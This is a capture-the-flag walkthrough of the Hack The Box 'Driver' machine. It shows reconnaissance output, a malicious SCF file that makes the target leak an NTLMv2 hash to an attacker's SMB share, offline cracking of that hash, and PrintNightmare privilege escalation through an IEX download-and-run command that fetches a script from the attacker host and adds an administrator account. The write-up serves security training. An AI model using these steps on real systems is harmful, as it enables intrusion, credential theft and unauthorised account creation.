Recon
Nmap
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-03 00:11 CDT
Nmap scan report for 10.10.11.106
Host is up (0.086s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-03T12:11:52
|_ start_date: 2021-10-03T11:42:52
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.64 secondsThere are three ports open 80:http,135:RPC,445:SMB
Let's start with RPC enumeration.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver]
└──╼ [★]$ rpcdump.py @10.10.11.106
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation
[*] Retrieving endpoint list from 10.10.11.106
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
ncacn_ip_tcp:10.10.11.106[49408]
ncalrpc:[WindowsShutdown]
ncacn_np:\\DRIVER[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc07AFF0]
Protocol: N/A
Provider: winlogon.exe
UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
ncalrpc:[WindowsShutdown]
ncacn_np:\\DRIVER[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc07AFF0]
ncalrpc:[WMsgKRpc07C601]
Protocol: N/A
Provider: N/A
UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0
Bindings:
ncalrpc:[LRPC-2a6be81cd150dd5892]
ncalrpc:[dabrpc]
ncalrpc:[csebpub]
ncalrpc:[LRPC-a38b13da26a353dc44]
ncalrpc:[LRPC-faee73832659d47dae]
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0
Bindings:
ncalrpc:[csebpub]
ncalrpc:[LRPC-a38b13da26a353dc44]
ncalrpc:[LRPC-faee73832659d47dae]
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
ncalrpc:[LRPC-faee73832659d47dae]
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
ncalrpc:[LRPC-678d1ec360e3015f2e]
ncalrpc:[LRPC-7ae4dc600e03f4b6f3]
ncalrpc:[LRPC-89846e6eace569cdca]
ncalrpc:[trkwks]
ncacn_np:\\DRIVER[\pipe\trkwks]
Protocol: N/A
Provider: N/A
UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0
Bindings:
ncalrpc:[LRPC-a38b13da26a353dc44]
ncalrpc:[LRPC-faee73832659d47dae]
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0
Bindings:
ncalrpc:[LRPC-9a837f8f41788dfcdc]
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0
Bindings:
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : AA371ED8-84FD-47C6-AD26-1F601A365A73 v0.0
Bindings:
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0
Bindings:
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0
Bindings:
ncacn_np:\\DRIVER[\pipe\LSM_API_service]
ncalrpc:[LSMApi]
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: sysntfy.dll
UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings:
ncalrpc:[LRPC-a712d71e316bbc2bdc]
ncalrpc:[actkernel]
ncalrpc:[umpo]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: N/A
UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0
Bindings:
ncalrpc:[actkernel]
ncalrpc:[umpo]
Protocol: N/A
Provider: wscsvc.dll
UUID : 06BBA54A-BE05-49F9-B0A0-30F790261023 v1.0 Security Center
Bindings:
ncalrpc:[OLEC5FCDE2565FE61AE5AA74BB782F0]
ncalrpc:[dhcpcsvc]
ncalrpc:[dhcpcsvc6]
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: nrpsrv.dll
UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
ncalrpc:[dhcpcsvc]
ncalrpc:[dhcpcsvc6]
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: dhcpcsvc.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc]
ncalrpc:[dhcpcsvc6]
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: dhcpcsvc6.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc6]
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: N/A
UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0
Bindings:
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: N/A
UUID : B3781086-6A54-489B-91C8-51D067172AB7 v1.0
Bindings:
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: N/A
UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0
Bindings:
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: N/A
UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0
Bindings:
ncalrpc:[LRPC-8614be2ddf0598e4d4]
ncalrpc:[AudioSrvDiagnosticsRpc]
ncalrpc:[PlaybackManagerRpc]
ncalrpc:[Audiosrv]
ncalrpc:[AudioClientRpc]
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
ncacn_ip_tcp:10.10.11.106[49409]
ncacn_np:\\DRIVER[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-35a35ef78256d0a51b]
Protocol: N/A
Provider: ssdpsrv.dll
UUID : 4B112204-0E19-11D3-B42B-0000F81FEB9F v1.0
Bindings:
ncalrpc:[LRPC-d64061aaebe686879b]
ncalrpc:[LRPC-69eccf73be9bcbaadf]
ncalrpc:[LRPC-678d1ec360e3015f2e]
Protocol: N/A
Provider: N/A
UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0
Bindings:
ncalrpc:[LRPC-69eccf73be9bcbaadf]
ncalrpc:[LRPC-678d1ec360e3015f2e]
Protocol: N/A
Provider: N/A
UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs
Bindings:
ncacn_np:\\DRIVER[\PIPE\srvsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint
Bindings:
ncacn_np:\\DRIVER[\PIPE\srvsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint
Bindings:
ncacn_np:\\DRIVER[\PIPE\srvsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: iphlpsvc.dll
UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings:
ncacn_np:\\DRIVER[\PIPE\srvsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings:
ncalrpc:[DeviceSetupManager]
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: srvsvc.dll
UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
ncalrpc:[DeviceSetupManager]
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-44080f84417aa243aa]
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0
Bindings:
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
ncacn_ip_tcp:10.10.11.106[49411]
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: N/A
Provider: N/A
UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0
Bindings:
ncalrpc:[LRPC-1c347d265496edc4a2]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
ncacn_np:\\DRIVER[\PIPE\atsvc]
ncalrpc:[OLEF581E3CC13C69616F99B33D843F2]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
[*] Received 464 endpoints.We use PrintNightmare exploit against Print System Remote Protocol but for that we need user creads so let's move further.
Same with the smb we need creads for listing the shares.
Port-80
When we go to the ip it's asking for username and passsword.
I try default creads like admin:admin and it's work.
We are inside home page.
When i go inside Firmware Updates there is a option for uploading firmware and the name of the site is MFP Firmware Update Center.
We can search any exploit for that related name.
I can't find any exploit for that related name but we can imagine that when we upload the file the server saves the file inside smb share.
So rather searching for exploit we can try SCF File Attacks.
Link : SMB Share – SCF File AttacksCreate a file called @exploit.scf and change the ip.
@exploit.scf
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver]
└──╼ [★]$ cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.14.116\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktopAfter that start the responder for capturing the hashes.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver]
└──╼ [★]$ responder -wrf --lm -v -I tun0Upload the scf file and click on submit.
Now check your responder we got the hash captured
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:6f09da70e73b9237:674092FE6EC25CB23CBB01D554A9B854:0101000000000000DEB3B39E53B8D70144991278610991070000000002000400270027000000000000000000Now let's crack the hash with john.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver]
└──╼ [★]$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2021-10-03 00:42) 10.00g/s 327680p/s 327680c/s 327680C/s softball27..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completedNow we have the passsword let's use evil-winrm to login inside machine and get the user.txt.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver]
└──╼ [★]$ evil-winrm -i 10.10.11.106 -u tony -p liltony
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> type ../Desktop/user.txt
4936df48c2c5217ac7e9b78f5a70c45a
*Evil-WinRM* PS C:\Users\tony\Documents> Privilege escalation
Now we are inside the machine and we also have creads so let's use PrintNightmare exploit because we see in the rpcdump Print System Remote Protocol is enabled.
Link : CVE-2021-1675 - PrintNightmare LPELet's upload the ps1 script with help of evil-winrm.
*Evil-WinRM* PS C:\Users\tony\Desktop> upload /root/Desktop/HTB/Driver/CVE-2021-1675.ps1
Info: Uploading /root/Desktop/HTB/Driver/CVE-2021-1675.ps1 to C:\Users\tony\Desktop\CVE-2021-1675.ps1
Data: 238080 bytes of 238080 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\tony\Desktop> But we can't import the script becuase ExecutionPolicy is Restricted.
*Evil-WinRM* PS C:\Users\tony\Desktop> Import-Module .\cve-2021-1675.ps1
File C:\Users\tony\Desktop\cve-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\cve-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:\Users\tony\Desktop> We can conform that with the help of Get-ExecutionPolicy command.
*Evil-WinRM* PS C:\Users\tony\Desktop> Get-ExecutionPolicy
Restricted
*Evil-WinRM* PS C:\Users\tony\Desktop> So we can bypass that with the help of download the file with help of IEX command.
The advantage of this command is it's automatically import the file after download.
Let's start the python server.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver/www]
└──╼ [★]$ ls
CVE-2021-1675.ps1
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver/www]
└──╼ [★]$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...Now let's download the file with IEX command.
*Evil-WinRM* PS C:\Users\tony\Desktop > IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.116/CVE-2021-1675.ps1')Now it's imported automatically let's create new user with Invoke-Nightmare command.
*Evil-WinRM* PS C:\Users\tony\Desktop > Invoke-Nightmare -NewUser "dedsec" -NewPassword "dedsec@123"now connect to the machine with new username and passsword and get root.txt.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Driver/www]
└──╼ [★]$ evil-winrm -i 10.10.11.106 -u dedsec -p dedsec@123And we pwned it …….









